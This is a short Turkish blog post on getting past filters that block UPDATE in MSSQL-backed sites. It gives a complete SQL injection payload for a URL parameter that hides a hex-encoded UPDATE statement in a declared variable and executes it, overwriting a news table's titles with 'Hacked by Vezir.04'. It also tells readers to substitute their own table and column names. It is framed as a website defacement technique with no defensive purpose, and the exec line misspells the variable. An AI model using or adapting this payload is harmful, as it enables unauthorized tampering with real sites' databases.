Update'nin filtreli olduğu sitelerde declare kullanımı

Öncelikle herkese merhaba her zaman söze başladığım gibi bu seferde aynısını söylemeyeyim zaman yok diye.Zaman var ama o zamanlarda farklı işlerle uğraştığım için pek ilgilenemiyorum blogla.Zaten web güvenliği işinide eskisi gibi pek takip etmiyorum fırsat buldukça bir şeyler paylaşmayada devam edecem .Takip eden yoktur belki ama yinede bir gün birinin işine yarar diye blogu açık tutuyorum. Şimdi Mssql veritabanlı bir sistemde update filtreliyse o zaman declare kullanarak update yapmayı deneyebilirsiniz. http://localhost/url.asp?id=1 and 1=declare @something nvarchar(500) set @something=0x7570646174652B6E6577735F6974656D2B7365742B5469746C653D274861636B65642062792056657A69722E3034272D2D;exec @someting;-- update+news_item+set+Title='Hacked by Vezir.04'-- alttaki kodlar bunun şifrelenmiş hali. 7570646174652B6E6577735F6974656D2B7365742B5469746C653D274861636B65642062792056657A69722E3034272D2D update+tablo adi+set+kolon adi='Hacked by Vezir.04'-- bu kısma tablo kolon isimlerini yazıp hex ile şifreleyip yolluyoruz. Bir daha ki sefere görüşmek üzere.